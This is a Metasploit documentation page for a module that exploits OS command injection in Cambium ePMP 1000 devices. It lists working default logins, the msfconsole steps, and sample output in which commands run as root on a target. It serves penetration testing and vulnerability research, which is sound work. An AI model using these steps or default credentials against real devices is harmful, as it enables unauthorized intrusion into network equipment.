metasploit-gs/documentation/modules/auxiliary/scanner/http/epmp1000_cmd_exec.md at f8a94de6710abe3042a26a9dca38dcccff2c93be

Files

T

juushya 30896d1fab Add Cambium ePMP Arbitrary Command Execution Module

2017-03-28 00:17:36 +05:30

950 B

Executable File

Raw Blame History

This module exploits an OS Command Injection vulnerability in Cambium ePMP 1000 (<v2.5) device management portal. It requires any one of the following login credentials - admin/admin, installer/installer, home/home - to execute arbitrary system commands.

Verification Steps

Do: use auxiliary/scanner/http/epmp1000_cmd_exec
Do: set RHOSTS [IP]
Do: set RPORT [PORT]
Do: run

Sample Output

msf > use auxiliary/scanner/http/epmp1000_cmd_exec
msf auxiliary(epmp1000_cmd_exec) > set rhosts 1.3.3.7
msf auxiliary(epmp1000_cmd_exec) > set rport 80
msf auxiliary(epmp1000_cmd_exec) > run

[+] 1.3.3.7:80 - Running Cambium ePMP 1000 version 2.2...
[*] 1.3.3.7:80 - Attempting to login...
[+] SUCCESSFUL LOGIN - 1.3.3.7:80 - "installer":"installer"
[*] 1.3.3.7:80 - Executing id; pwd
uid=0(root) gid=0(root)
/www/cgi-bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

950 B Executable File Raw Blame History

Verification Steps

Sample Output

950 B

Executable File

Raw Blame History